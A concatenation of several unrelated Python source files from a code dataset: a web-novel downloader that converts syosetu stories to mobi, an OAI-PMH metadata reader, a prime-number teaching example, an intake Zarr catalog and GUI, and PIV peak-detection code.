def pattern(self):
return self.value['ncode_pattern']
def valid_length(self):
return self.value['meta_list_valid_length']
# TODO: マルチユーザー対応?
class WebNovel:
def __init__(self, url):
# TODO: __download_image()が使い終わったらまた初期化する
self.image_count = 1 # __download_image() only use
self.__judge_publisher(url)
self.__get_meta()
def is_serial_story(self):
return self.meta['serial_story_flag']
def get_ncode(self):
return self.ncode
def get_publisher(self):
return self.publisher
# TODO: validateのためにラッパーメソッドを作る。引数のパスを後ろくっつけて、normpath()->validate
def get_novel_path(self):
return self.novel_path + '/'
def get_output_name(self):
return self.meta['output_name']
# TODO: validate
def get_base_path(self):
return self.base_path + '/'
def get_title(self):
return self.meta['title']
def get_episode(self):
return self.meta['episode']
def get_writer(self):
return self.meta['writer']
def get_last_posted(self):
return self.meta['last_posted']
def get_updated(self):
return self.meta['updated']
def get_mobi(self, is_force):
self.download(is_force)
self.format()
return self.convert()
def download(self, is_force):
self.__make_html_dir(is_force)
if self.get_publisher() == 'narou':
dirs = self.__gen_output_dirs()
for d in dirs:
path = self.get_novel_path() + 'html/' + d + 'index.html'
url = Publishers.narou.url() + self.get_ncode() + '/' + d
self.__download_file(url, path)
def format(self):
self.__print_message('Format', self.get_novel_path() + 'html/')
self.__make_tmp_dir()
dirs = self.__gen_output_dirs()
for d in dirs:
if d:
self.__format_episode(d)
else:
self.__format_index()
# TODO: validate
# TODO: タイトルをファイル名に
def convert(self):
self.__print_message('Convert', self.get_novel_path() + 'tmp/')
kindlegen = self.get_base_path() + 'bin/kindlegen'
opf = self.get_novel_path() + 'tmp/content.opf'
# opf = shlex.quote(self.get_novel_path() + 'tmp/content.opf')
output = shlex.quote(self.get_output_name())
cmd = [kindlegen, opf, '-verbose', '-locale', 'en', '-o', output]
# subprocess.run(cmd)
subprocess.run(cmd, stdout=subprocess.DEVNULL)
mobi = self.get_novel_path() + 'tmp/' + output
try:
return shutil.move(mobi, self.get_novel_path())
except shutil.Error:
os.remove(self.get_novel_path() + output)
return shutil.move(mobi, self.get_novel_path())
def is_nested_list(self, obj):
is_nested = False
if isinstance(obj, list):
for val in obj:
is_nested |= isinstance(val, list)
return is_nested
def worship_jinja(self, tpl_name, context, create_path):
loader = FileSystemLoader(self.get_base_path() + 'template/', encoding='utf8')
env = Environment(loader=loader, trim_blocks=True, autoescape=True)
tpl = env.get_template(tpl_name)
output = tpl.render(context)
self.__print_message('Create', create_path)
with open(create_path, 'wb') as f:
f.write(output.encode())
def print_meta_json(self):
string = json.dumps({
'path': os.path.normpath(self.get_novel_path() + self.get_output_name()),
'publisher': Publishers[self.get_publisher()].value['name'],
'title': self.get_title(),
'writer': self.get_writer(),
'ncode': self.get_ncode(),
'episode': self.get_episode(),
'last_posted': self.get_last_posted(),
'updated': self.get_updated(),
'status': 'Success'
})
print(string)
def __judge_publisher(self, url):
for publisher in Publishers:
pattern = r'^' + publisher.url()
if re.match(pattern, url): # if URL is valid
pattern = publisher.pattern()
match = re.search(pattern, url)
if match and isinstance(match.group(), str): # if ncode is valid
self.publisher = publisher.name
self.ncode = match.group()
domain = re.sub(r'^https?://', '', publisher.url())
path = 'cache/' + domain + self.get_ncode() + '/'
base = os.path.dirname(os.path.relpath(__file__))
self.base_path = os.path.normpath(base)
self.novel_path = os.path.normpath(os.path.join(base, path))
break
else:
raise RuntimeError('Ncode is invaild')
else:
raise RuntimeError('Publisher NOT Exist')
def __get_meta(self):
if not hasattr(self, 'meta'):
if self.get_publisher() == 'narou':
narou = Publishers.narou
params={'ncode': self.get_ncode(), 'out': 'json'}
response = requests.get(narou.api(), params)
meta = json.loads(response.text)
if len(meta) == narou.valid_length():
meta = meta[1]
self.meta = {}
self.meta['title'] = meta['title']
self.meta['writer'] = meta['writer']
self.meta['episode'] = meta['general_all_no']
self.meta['last_posted'] = meta['general_lastup']
self.meta['updated'] = meta['novelupdated_at']
self.meta['serial_story_flag'] = (meta['novel_type'] == 1)
self.meta['output_name'] = self.get_ncode() + '.mobi'
# self.meta['output_name'] = self.get_title() + '.mobi'
else:
raise RuntimeError('Novel NOT Exist')
# TODO: validation
def __make_html_dir(self, is_force):
dirs = self.__gen_output_dirs()
try:
os.makedirs(self.get_novel_path())
except FileExistsError:
if is_force:
shutil.rmtree(self.get_novel_path())
os.makedirs(self.get_novel_path())
else:
raise FileExistsError
for d in dirs:
os.makedirs(self.get_novel_path() + 'html/' + d)
def __make_tmp_dir(self):
# TODO: コピーするファイルは細かく指定したほうがいい。ファイル差し替えの危険はあるけどめんどいので優先度低
try:
common = self.get_base_path() + 'common/'
tmp = self.get_novel_path() + 'tmp/'
shutil.copytree(common, tmp)
except FileExistsError:
# TODO: 削除してもう一度コピーする?
pass
def __parse_narou_index(self, soup):
toc = list()
index = soup.find(class_='index_box')
for child in index.children:
if not child.string == '\n':
if 'chapter_title' in child['class']:
toc.append(child.string)
toc.append(list()) # subtitle list
elif 'novel_sublist2' in child['class']:
if toc and isinstance(toc[-1], list):
toc[-1].append(child.a.string)
else:
toc.append(child.a.string)
return toc
def __parse_other_index(self, soup):
toc = list()
return toc
def __format_episode(self, ep):
read_path = self.get_novel_path() + 'html/' + ep + 'index.html'
soup = self.__read_html(read_path)
if self.get_publisher() == 'narou':
subtitle, paragraphs = self.__parse_narou_episode(soup)
else: # TODO: ほかの小説投稿サイト
subtitle, paragraphs = self.__parse_other_episode(soup)
context = dict(
title = subtitle,
pars = paragraphs
)
create_path = self.get_novel_path() + 'tmp/xhtml/' + str(ep).replace('/', '') + '.xhtml'
self.worship_jinja('episode.tpl.xhtml', context, create_path)
def __parse_narou_episode(self, soup):
text = soup.find(id='novel_honbun')
subtitle = soup.find(class_='novel_subtitle').string
imgs = text.find_all('img')
urls = [img['src'] for img in imgs]
paths = self.__download_images(urls)
queue = deque(paths)
# TODO: parsはタグを含むのでテンプレート内でエスケープできない
# parse html (this block is unco)
# TODO: 前書きと後書きに対応
pars = []
pre_is_br = False
for child in text.children:
if isinstance(child, Tag): # strip wrapper tag from novel context
if child.name == 'p': # if tag contains text like serif, land-sentence
buf = ''
for c in child:
buf += str(c)
pars.append(re.sub(r'^ ', '', buf))
if isinstance(child, NavigableString) and not str(child) == '\n':
pars.append(re.sub(r'^\n?\u3000?', '', str(child)))
pre_is_br = False
elif isinstance(child, Tag):
if child.name == 'br':
if pre_is_br:
pars.append('<br />')
else:
pre_is_br = True
return subtitle, pars
def __parse_other_episode(self, soup):
raise RuntimeError('This publisher is NOT supported')
def __format_index(self):
path = self.get_novel_path() + 'html/index.html'
soup = self.__read_html(path)
if self.is_serial_story():
if self.get_publisher() == 'narou':
toc = self.__parse_narou_index(soup)
else:
toc = self.__parse_other_index(soup) # TODO: ほかの小説投稿サイト
self.__create_navigation(toc) # create navigation-documents.xhtml
self.__create_toc(toc) # create toc.xhtml
else: # if short story
raise RuntimeError('Short story is NOT supported')
self.__create_titlepage() # create titlepage.xhtml
self.__create_opf() # create content.opf
def __create_navigation(self, toc):
context = dict(
toc = toc
)
path = self.get_novel_path() + 'tmp/navigation-documents.xhtml'
if self.is_nested_list(toc):
tpl_path = 'navigation-documents/some-chapters.tpl.xhtml'
else:
tpl_path = 'navigation-documents/no-chapters.tpl.xhtml'
self.worship_jinja(tpl_path, context, path)
def __create_toc(self, toc):
context = dict(
toc = toc,
title = self.get_title()
)
path = self.get_novel_path() + 'tmp/xhtml/toc.xhtml'
if self.is_nested_list(toc):
tpl_path = 'toc/some-chapters.tpl.xhtml'
else:
tpl_path = 'toc/no-chapters.tpl.xhtml'
self.worship_jinja(tpl_path, context, path)
def __create_titlepage(self):
context = dict(
title = self.get_title(),
writer = self.get_writer()
)
path = self.get_novel_path() + 'tmp/xhtml/titlepage.xhtml'
self.worship_jinja('titlepage.tpl.xhtml', context, path)
def __create_opf(self):
context = dict(
title = self.get_title(),
writer = self.get_writer(),
publisher = self.get_publisher(),
episode = self.get_episode()
)
path = self.get_novel_path() + 'tmp/content.opf'
self.worship_jinja('content.tpl.opf', context, path)
def __download_images(self, urls):
paths = []
for url in urls:
url = re.sub(r'^//', "http://", url) # URLの補正
path = self.get_novel_path() + 'tmp/image/' + str(self.image_count) + '.jpg'
paths.append('../image/' + str(self.image_count) + '.jpg')
self.__download_file(url, path)
self.image_count += 1
return paths
def __download_file(self, url, path):
self.__print_message('Download', url)
headers = {
'Host': 'ncode.syosetu.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'ja,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Upgrade-Insecure-Requests': '1'
}
response = requests.get(url, headers=headers)
with open(path, 'wb') as f:
f.write(response.content)
def __read_html(self, path):
with open(path, 'rb') as f:
html = f.read()
return BeautifulSoup(html, 'html.parser')
def __gen_output_dirs(self):
dirs = [''] # '' mean './'
if self.is_serial_story():
last = self.get_episode() + 1
dirs += [str(ep) + '/' for ep in range(1, last)]
return dirs
def __print_message(self, verb, obj):
pass
# print('%-8s:' % verb, obj)
def get(url, is_force):
novel = WebNovel(url)
novel.get_mobi(is_force)
def get_json(url, is_force):
novel = WebNovel(url)
try:
novel.get_mobi(is_force)
novel.print_meta_json()
except FileExistsError:
print(json.dumps({'status': 'FileExistsError'}))
def download(url):
narou = WebNovel(url)
narou.download()
def convert(url):
narou = WebNovel(url)
narou.convert()
def print_usage():
print("Usage: $ python narou.py [command]")
print(" - get [url] [--force]")
print(" - get_json [url] [--force]")
print(" - download [url]")
print(" - format [url]")
print(" - convert [url]")
# print(" - update [url]")
sys.exit(1)
def main():
argvs = sys.argv
argc = len(argvs)
if argc != 3 and argc != 4:
print_usage()
else:
cmd = argvs[1]
url = argvs[2]
# TODO: argparse
try:
opt = argvs[3]
except:
opt = ''
if cmd == 'get':
get(url, is_force=True)
elif cmd == 'download':
download(url)
elif cmd == 'format':
format(url)
elif cmd == 'convert':
convert(url)
elif cmd == 'get_json':
if opt == '--force':
get_json(url, is_force=True)
else:
get_json(url, is_force=False)
else:
print_usage()
if __name__ == '__main__':
main()
``` |
{
"source": "jr3cermak/robs-kitchensink",
"score": 3
} |
#### File: src/oaipmh/metadata.py
```python
from lxml import etree
from lxml.etree import SubElement
from oaipmh import common
class MetadataRegistry(object):
"""A registry that contains readers and writers of metadata.
a reader is a function that takes a chunk of (parsed) XML and
returns a metadata object.
a writer is a function that takes a takes a metadata object and
produces a chunk of XML in the right format for this metadata.
"""
def __init__(self):
self._readers = {}
self._writers = {}
def registerReader(self, metadata_prefix, reader):
self._readers[metadata_prefix] = reader
def registerWriter(self, metadata_prefix, writer):
self._writers[metadata_prefix] = writer
def hasReader(self, metadata_prefix):
return metadata_prefix in self._readers
def hasWriter(self, metadata_prefix):
return metadata_prefix in self._writers
def readMetadata(self, metadata_prefix, element):
"""Turn XML into metadata object.
element - element to read in
returns - metadata object
"""
return self._readers[metadata_prefix](element)
def writeMetadata(self, metadata_prefix, element, metadata):
"""Write metadata as XML.
element - ElementTree element to write under
metadata - metadata object to write
"""
self._writers[metadata_prefix](element, metadata)
global_metadata_registry = MetadataRegistry()
class Error(Exception):
pass
class MetadataReader(object):
"""A default implementation of a reader based on fields.
"""
def __init__(self, fields, namespaces=None):
self._fields = fields
self._namespaces = namespaces or {}
def __call__(self, element):
map = {}
# create XPathEvaluator for this element
xpath_evaluator = etree.XPathEvaluator(element,
namespaces=self._namespaces)
e = xpath_evaluator.evaluate
# now extra field info according to xpath expr
for field_name, (field_type, expr) in self._fields.items():
if field_type == 'bytes':
value = str(e(expr))
elif field_type == 'bytesList':
value = [str(item) for item in e(expr)]
elif field_type == 'text':
# make sure we get back unicode strings instead
# of lxml.etree._ElementUnicodeResult objects.
value = unicode(e(expr))
elif field_type == 'textList':
# make sure we get back unicode strings instead
# of lxml.etree._ElementUnicodeResult objects.
value = [unicode(v) for v in e(expr)]
else:
raise Error, "Unknown field type: %s" % field_type
map[field_name] = value
return common.Metadata(map)
oai_dc_reader = MetadataReader(
fields={
'title': ('textList', 'oai_dc:dc/dc:title/text()'),
'creator': ('textList', 'oai_dc:dc/dc:creator/text()'),
'subject': ('textList', 'oai_dc:dc/dc:subject/text()'),
'description': ('textList', 'oai_dc:dc/dc:description/text()'),
'publisher': ('textList', 'oai_dc:dc/dc:publisher/text()'),
'contributor': ('textList', 'oai_dc:dc/dc:contributor/text()'),
'date': ('textList', 'oai_dc:dc/dc:date/text()'),
'type': ('textList', 'oai_dc:dc/dc:type/text()'),
'format': ('textList', 'oai_dc:dc/dc:format/text()'),
'identifier': ('textList', 'oai_dc:dc/dc:identifier/text()'),
'source': ('textList', 'oai_dc:dc/dc:source/text()'),
'language': ('textList', 'oai_dc:dc/dc:language/text()'),
'relation': ('textList', 'oai_dc:dc/dc:relation/text()'),
'coverage': ('textList', 'oai_dc:dc/dc:coverage/text()'),
'rights': ('textList', 'oai_dc:dc/dc:rights/text()')
},
namespaces={
'oai_dc': 'http://www.openarchives.org/OAI/2.0/oai_dc/',
'dc' : 'http://purl.org/dc/elements/1.1/'}
)
oai_iso19139_reader = MetadataReader(
fields={
'title': ('textList', 'gmd:MD_Metadata/gmd:identificationInfo/gmd:MD_DataIdentification/gmd:citation/gmd:CI_Citation/gmd:title/gco:CharacterString/text()')
},
namespaces={
'gmd': 'http://www.isotc211.org/2005/gmd',
'gts': 'http://www.isotc211.org/2005/gts',
'gco': 'http://www.isotc211.org/2005/gco',
'gml': 'http://www.opengis.net/gml',
'geonet': 'http://www.fao.org/geonetwork'}
)
# mets uses: xmlns="http://www.loc.gov/METS/"
# Since it is in the default namespace, we have remap each element
# into its own namespace: mets (requirement of lxml & etree)
# ORIG: mets/dmdSec/mdWrap/xmlData/mods:mods/mods:titleInfo/mods:title
# USE : mets:mets/mets:dmdSec/mets:mdWrap/mets:xmlData/mods:mods/mods:titleInfo/mods:title
oai_mets_reader = MetadataReader(
fields={
'title': ('textList', 'mets:mets/mets:dmdSec/mets:mdWrap/mets:xmlData/mods:mods/mods:titleInfo/mods:title/text()')
},
namespaces={
'mets': 'http://www.loc.gov/METS/',
'mods': 'http://www.loc.gov/mods/v3'}
)
oai_ore_reader = MetadataReader(
fields={
'title': ('textList', 'atom:entry/atom:title/text()')
},
namespaces={
'atom': 'http://www.w3.org/2005/Atom',
'ore': 'http://www.openarchives.org/ore/terms/',
'oreatom': 'http://www.openarchives.org/ore/atom/',
'dcterms': 'http://purl.org/dc/terms/'}
)
oai_qdc_reader = MetadataReader(
fields={
'title': ('textList', 'qdc:qualifieddc/dc:title/text()')
},
namespaces={
'dc': 'http://purl.org/dc/elements/1.1/',
'dcterms': 'http://purl.org/dc/terms/',
'qdc': 'http://epubs.cclrc.ac.uk/xmlns/qdc/'}
)
oai_rdf_reader = MetadataReader(
fields={
'title': ('textList', 'rdf:RDF/ow:Publication/dc:title/text()')
},
namespaces={
'rdf': 'http://www.w3.org/1999/02/22-rdf-syntax-ns#',
'ow': 'http://www.ontoweb.org/ontology/1#',
'dc': 'http://purl.org/dc/elements/1.1/',
'ds': 'http://dspace.org/ds/elements/1.1/'}
)
``` |
{
"source": "jr6321/810_examples",
"score": 4
} |
#### File: jr6321/810_examples/primes.py
```python
import unittest
import time
def next_prime():
""" generate prime numbers but store the primes you've generated so far and compare
new potential primes only against the list of generated primes.
"""
primes = [2]
yield 2 # 2 is the first prime number by definition
cur = 3 # cur is the next number to be checked
while True: # potentially generate an infinite number of primes
for p in primes:
#print('checking {} % {}'.format(cur, p))
if cur % p == 0:
break
else:
# exhausted all of the primes and found another prime number
primes.append(cur)
yield cur
cur += 1
def next_prime_naive():
""" generate prime numbers by dividing by 2 up to the number """
cur = 2
while True: # potentially generate an infinite number of primes
for i in range(2, cur):
#print('checking {} % {}'.format(cur, i))
if cur % i == 0:
break # cur is divisible by i so look at next value of cur
else:
# didn't divide evenly by any number so found another prime number
yield cur
cur += 1
def nprimes_naive(n):
""" return a list with the first n prime numbers """
gen = next_prime_naive()
return [next(gen) for i in range(n)]
def prime_naive_comparisons(n):
""" generate prime numbers by comparing up to cur // 2 + 1 """
comparisons = 0
cur = 2
for m in range(n):
for i in range(2, cur):
#print("{}: comparing {} and {}".format(comparisons, cur, i))
comparisons += 1
if cur % i == 0:
break # cur is divisible by i so look at next value of cur
# didn't divide evenly by any number so found another prime number
cur += 1
return comparisons
def prime_comparisons(n):
""" generate prime numbers by comparing up to cur // 2 + 1 """
comparisons = 0
primes = [2]
cur = 3 # cur is the next number to be checked
for i in range(n):
for p in primes:
comparisons += 1
if cur % p == 0:
break
else:
# exhausted all of the primes and found another prime number
primes.append(cur)
cur += 1
return comparisons
def is_prime(n):
""" return True/False if n is prime """
for p in next_prime():
if p == n:
return True
elif p > n:
return False
def nth_prime(n):
""" return the nth prime number """
for i, p in enumerate(next_prime()):
if i + 1 >= n:
return p
def nth_prime_naive(n):
""" return the nth prime number using next_prime2(), not next_prime() """
for i, p in enumerate(next_prime_naive()):
if i + 1 >= n:
return p
class PrimeTest(unittest.TestCase):
def test(self):
self.assertEqual(nprimes_naive(5), [2, 3, 5, 7, 11])
self.assertEqual(nth_prime(1), 2)
self.assertEqual(nth_prime(2), 3)
self.assertEqual(nth_prime(5), 11)
self.assertEqual(nth_prime_naive(1), 2)
self.assertEqual(nth_prime_naive(2), 3)
self.assertEqual(nth_prime_naive(5), 11)
def time_nprimes_naive(n):
gen = next_prime_naive()
start = time.time()
for i in range(n):
next(gen)
end = time.time()
print("{}: {:.5f}".format(n, end - start))
def time_nprimes(n):
comparisons = prime_comparisons(n)
gen = next_prime()
start = time.time()
for i in range(n):
next(gen)
end = time.time()
print("better: {}: {} comparisons {:.5f} seconds".format(n, comparisons, end - start))
def timeit(func, *args, **kwargs):
start = time.time()
result = func(*args, **kwargs)
end = time.time()
return result, end - start
def compare_times(n):
nth_result, nth_secs = timeit(nth_prime, n)
nth2_result, nth2_secs = timeit(nth_prime2, n)
if nth_secs < nth2_secs:
print("nth_prime({0}) beat nth_prime2({0}) by {1:.5} seconds".format(n, nth2_secs - nth_secs))
else:
print("nth_prime2({0}) beat nth_prime({0}) by {1:.5} seconds".format(n, nth_secs - nth2_secs))
if __name__ == "__main__":
#unittest.main()
print("finding 10 primes requires {} comparisons".format(prime_naive_comparisons(13)))
#print("finding 100 primes requires {} comparisons".format(prime_naive_comparisons(100)))
time_nprimes_naive(100)
print("finding 200 primes requires {} comparisons".format(prime_naive_comparisons(200)))
time_nprimes_naive(200)
print("finding 400 primes requires {} comparisons".format(prime_naive_comparisons(400)))
time_nprimes_naive(400)
print("finding 800 primes requires {} comparisons".format(prime_naive_comparisons(800)))
#time_nprimes_naive(800)
time_nprimes(100)
time_nprimes(200)
time_nprimes(400)
time_nprimes(800)
#print(nth_prime(1000))
#print(nth_prime(1500))
#print(nprimes(1000))
"""
compare_times(10)
compare_times(1000)
compare_times(2500)
"""
``` |
{
"source": "j-r77/intake",
"score": 2
} |
#### File: intake/catalog/zarr.py
```python
from .base import Catalog
from .local import LocalCatalogEntry
from ..source import register_driver
class ZarrGroupCatalog(Catalog):
"""A catalog of the members of a Zarr group."""
version = '0.0.1'
container = 'catalog'
partition_access = None
name = 'zarr_cat'
def __init__(self, urlpath, storage_options=None, component=None, metadata=None,
consolidated=False):
"""
Parameters
----------
urlpath : str
Location of data file(s), possibly including protocol information
storage_options : dict, optional
Passed on to storage backend for remote files
component : str, optional
If None, build a catalog from the root group. If given, build the
catalog from the group at this location in the hierarchy.
metadata : dict, optional
Catalog metadata. If not provided, will be populated from Zarr
group attributes.
consolidated : bool, optional
If True, assume Zarr metadata has been consolidated.
"""
self._urlpath = urlpath
self._storage_options = storage_options or {}
self._component = component
self._consolidated = consolidated
self._grp = None
super().__init__(metadata=metadata)
def _load(self):
import zarr
if self._grp is None:
# obtain the zarr root group
if isinstance(self._urlpath, zarr.hierarchy.Group):
# use already-opened group, allows support for nested groups
# as catalogs
root = self._urlpath
else:
# obtain store
if isinstance(self._urlpath, str):
# open store from url
from fsspec import get_mapper
store = get_mapper(self._urlpath, **self._storage_options)
else:
# assume store passed directly
store = self._urlpath
# open root group
if self._consolidated:
# use consolidated metadata
root = zarr.open_consolidated(store=store, mode='r')
else:
root = zarr.open_group(store=store, mode='r')
# deal with component path
if self._component is None:
self._grp = root
else:
self._grp = root[self._component]
# use zarr attributes as metadata
self.metadata.update(self._grp.attrs.asdict())
# build catalog entries
entries = {}
for k, v in self._grp.items():
if isinstance(v, zarr.core.Array):
entry = LocalCatalogEntry(name=k,
description='',
driver='ndzarr',
args=dict(urlpath=v),
catalog=self)
else:
entry = LocalCatalogEntry(name=k,
description='',
driver='zarr_cat',
args=dict(urlpath=v))
entries[k] = entry
self._entries = entries
def to_zarr(self):
return self._grp
```
#### File: gui/source/gui.py
```python
from functools import partial
import panel as pn
from intake.utils import remake_instance
from ..base import Base, enable_widget, MAX_WIDTH
from .select import SourceSelector
from .defined_plots import Plots
from .description import Description
class SourceGUI(Base):
"""
Top level GUI panel that contains controls and all visible sub-panels
This class is responsible for coordinating the inputs and outputs
of various sup-panels and their effects on each other.
Parameters
----------
cats: list of catalogs, opt
catalogs used to initalize, provided as objects.
sources: list of sources, opt
sources used to initalize, provided as objects.
done_callback: func, opt
called when the object's main job has completed. In this case,
selecting source(s).
Attributes
----------
children: list of panel objects
children that will be used to populate the panel when visible
panel: panel layout object
instance of a panel layout (row or column) that contains children
when visible
watchers: list of param watchers
watchers that are set on children - cleaned up when visible
is set to false.
"""
def __init__(self, cats=None, sources=None, done_callback=None, **kwargs):
self._cats = cats
self._sources = sources
self.panel = pn.Column(name='Entries', width_policy='max',
max_width=MAX_WIDTH)
self.done_callback = done_callback
self.plot_widget = pn.widgets.Toggle(
name='📊',
value=False,
disabled=True,
width=50)
self.pars_widget = pn.widgets.Toggle(
name='⚙',
value=False,
disabled=True,
width=50)
self.controls = [self.plot_widget, self.pars_widget]
self.control_panel = pn.Row(name='Controls', margin=0)
self.pars_editor = ParsEditor()
self.select = SourceSelector(cats=self._cats,
sources=self._sources,
done_callback=self.callback)
self.description = Description()
self.description.source = self.sources
self.plot = Plots(source=self.source_instance,
visible=self.plot_widget.value,
visible_callback=partial(
setattr, self.plot_widget, 'value'))
super().__init__(**kwargs)
def _setup_watchers(self):
self.watchers = [
self.plot_widget.param.watch(self.on_click_plot_widget, 'value'),
self.pars_widget.param.watch(self.on_click_pars_widget, 'value'),
self.select.widget.link(self.description, value='source'),
]
def setup(self):
self._setup_watchers()
self.children = [
pn.Column(
pn.Row(
pn.Column(
self.select.panel,
self.control_panel,
margin=0,
),
self.description.panel,
margin=0,
),
self.plot.panel,
margin=0,
width_policy='max'
)
]
@Base.visible.setter
def visible(self, visible):
"""When visible changed, do setup or unwatch and call visible_callback"""
self._visible = visible
if visible and len(self._panel.objects) == 0:
self.setup()
self.select.visible = True
self.description.visible = True
if len(self.control_panel.objects) == 0:
self.control_panel.extend(self.controls)
self._panel.extend(self.children)
elif not visible and len(self._panel.objects) > 0:
self.unwatch()
# do children
self.select.visible = False
self.control_panel.clear()
self.description.visible = False
self.plot.visible = False
self._panel.clear()
if self.visible_callback:
self.visible_callback(visible)
def callback(self, sources):
"""When a source is selected, enable widgets that depend on that condition
and do done_callback"""
if hasattr(self, 'plot'):
# guard since this cannot happen until plot is ready
self.plot.visible = False
enable = bool(sources)
self.plot_widget.value = False
self.pars_widget.value = False
enable_widget(self.plot_widget, enable)
enable_widget(self.pars_widget, enable and sources[0]._user_parameters)
self.pars_editor.dirty = True # reset pars editor
if self.done_callback:
self.done_callback(sources)
def on_click_plot_widget(self, event):
""" When the plot control is toggled, set visibility and hand down source"""
self.plot.source = self.source_instance
self.plot.visible = event.new
def on_click_pars_widget(self, event):
if event.new:
pars = self.sources[0]._user_parameters
self.pars_editor.remake(pars)
self.description.panel.append(self.pars_editor.panel)
else:
self.description.panel.remove(self.pars_editor.panel)
@property
def sources(self):
"""Sources that have been selected from the source GUI"""
return self.select.selected
@property
def source_instance(self):
"""DataSource from the current selection using current parameters"""
sel = self.select.selected
args = self.pars_editor.kwargs
if sel:
return sel[0](**args)
def __getstate__(self):
"""Serialize the current state of the object"""
return {
'visible': self.visible,
'select': self.select.__getstate__(),
'description': self.description.__getstate__(include_source=False),
'plot': self.plot.__getstate__(include_source=False),
}
def __setstate__(self, state):
"""Set the current state of the object from the serialized version.
Works inplace. See ``__getstate__`` to get serialized version and
``from_state`` to create a new object."""
self.visible = state.get('visible', True)
if self.visible:
self.select.__setstate__(state['select'])
self.description.__setstate__(state['description'])
self.plot.__setstate__(state['plot'])
return self
@classmethod
def from_state(cls, state):
"""Create a new object from a serialized exising object.
Example
-------
original = SourceGUI()
copy = SourceGUI.from_state(original.__getstate__())
"""
return cls(cats=[], sources=[]).__setstate__(state)
class ParsEditor(Base):
"""Edit user parameters using widgets"""
def __init__(self):
self.panel = pn.Column(pn.Spacer())
self.dirty = True # don't use kwargs until source is set
def remake(self, upars):
"""Set up parameter widgets for given list of UserParameter objects"""
self.panel.clear()
for upar in upars:
self.panel.append(self.par_to_widget(upar))
self.dirty = False
@property
def kwargs(self):
"""The current selections"""
if self.dirty:
return {}
else:
return {w.name: w.value for w in self.panel}
@staticmethod
def par_to_widget(par):
if par.allowed:
w = pn.widgets.Select(options=par.allowed)
elif par.type in ['str', 'unicode']:
w = pn.widgets.TextInput()
elif par.type == 'int':
w = pn.widgets.IntSlider(start=par.min, end=par.max, step=1)
elif par.type == 'float':
w = pn.widgets.FloatSlider(start=par.min, end=par.max)
elif par.type == 'datetime':
w = pn.widgets.DatetimeInput()
else:
w = pn.widgets.LiteralInput()
w.name = par.name
w.value = par.default
return w
``` |
{
"source": "jr7/pypiv",
"score": 3
} |
#### File: pypiv/piv/peak_detection.py
```python
import numpy as np
import numpy.linalg as nl
def find_peak(corr, method='gaussian'):
"""Peak detection algorithm switch
After loading the correlation window an maximum finder is invoked.
The correlation window is cut down to the necessary 9 points around the maximum.
Afterwards the maximum is checked not to be close to the boarder of the correlation frame.
This cropped window is used in along with the chosen method to interpolate the sub pixel shift.
Each interpolation method returns a tuple with the sub pixel shift in x and y direction.
The maximums position and the sub pixel shift are added and returned.
If an error occurred during the sub pixel interpolation the shift is set to nan.
Also if the interpolation method is unknown an exception in thrown.
:param corr: correlation window
:param method: peak finder algorithm (gaussian, centroid, parabolic, 9point)
:raises: Sub pixel interpolation method not found
:returns: shift in interrogation window
"""
i, j = np.unravel_index(corr.argmax(), corr.shape)
if check_peak_position(corr, i, j) is False:
return np.nan, np.nan
window = corr[i-1:i+2, j-1:j+2]
if method == 'gaussian':
subpixel_interpolation = gaussian
elif method == 'centroid':
subpixel_interpolation = centroid
elif method == 'parabolic':
subpixel_interpolation = parabolic
elif method == '9point':
subpixel_interpolation = gaussian2D
else:
raise Exception('Sub pixel interpolation method not found!')
try:
dx, dy = subpixel_interpolation(window)
except:
return np.nan, np.nan
else:
return (i + dx, j + dy)
def check_peak_position(corr, i, j):
"""Checking weather the maximum is at the boarder of the correlation window
:param corr: correlation window
:param i: first index position of the maximum
:param j: second index position of the maximum
:returns: true if maximum is inside the correlation window
"""
dist = 3
li, lj = corr.shape
i_inside = (i >= dist) & (i < li - dist)
j_inside = (j >= dist) & (j < lj - dist)
if i_inside and j_inside:
return True
else:
return False
def gaussian(window):
"""Gaussian interpolation for sub pixel shift"""
ip = lambda x : (np.log(x[0]) - np.log(x[2]))\
/(2*np.log(x[2]) - 4*np.log(x[1]) + 2*np.log(x[0]))
return ip(window[:, 1]), ip(window[1])
def centroid(window):
"""Centroid interpolation for sub pixel shift"""
ip = lambda x : (x[2] - x[0])/(x[0] + x[1] + x[2])
return ip(window[:, 1]), ip(window[1])
def parabolic(window):
"""Parabolic interpolation for sub pixel shift"""
ip = lambda x : (x[0] - x[2])/(2*x[0] - 4*x[1] + 2*x[2])
return ip(window[:, 1]), ip(window[1])
def gaussian2D(window):
"""Real 2D Gaussian interpolation for sub pixel shift"""
#ref on paper
w = np.ones((3, 3))*(1./9)
rhs = np.zeros(6)
M = np.zeros((6,6))
for i in [-1, 0, 1]:
for j in [-1, 0, 1]:
rhs = rhs + np.array([i*w[i+1, j+1]*np.log(np.abs(window[i+1, j+1])),
j*w[i+1, j+1]*np.log(np.abs(window[i+1, j+1])),
i*j*w[i+1, j+1]*np.log(np.abs(window[i+1, j+1])),
i*i*w[i+1, j+1]*np.log(np.abs(window[i+1, j+1])),
j*j*w[i+1, j+1]*np.log(np.abs(window[i+1, j+1])),
w[i+1, j+1]*np.log(np.abs(window[i+1, j+1]))], dtype='float')
M = M + w[i+1, j+1]*np.array([[ i*i, i*j, i*i*j, i*i*i, i*j*j, i],
[ i*j, j*j, i*j*j, i*i*j, j*j*j, j],
[i*i*j, i*j*j, i*i*j*j, i*i*i*j, i*j*j*j, i*j],
[i*i*i, i*i*j, i*i*i*j, i*i*i*i, i*i*j*j, i*i],
[i*j*j, j*j*j, i*j*j*j, i*i*j*j, j*j*j*j, j*j],
[ i, j, i*j, i*i, j*j, 1]], dtype='float')
solution = nl.solve(M, rhs)
dx = ( solution[2]*solution[1] - 2.0*solution[0]*solution[4])/ \
(4.0*solution[3]*solution[4] - solution[2]*solution[2])
dy = ( solution[2]*solution[0] - 2.0*solution[1]*solution[3])/ \
(4.0*solution[3]*solution[4] - solution[2]*solution[2])
return dx, dy
```
#### File: pypiv/pypiv/velofilter.py
```python
import numpy as np
from scipy.stats import linregress as li
from math import exp
def calc_factor(field,stepsize=0.01):
"""
Function for calculation of the summed binning.
The returned result is an integral over the binning of the velocities.
It is done for the negative and positive half separately.
:param field: is a 1D field which will be binned
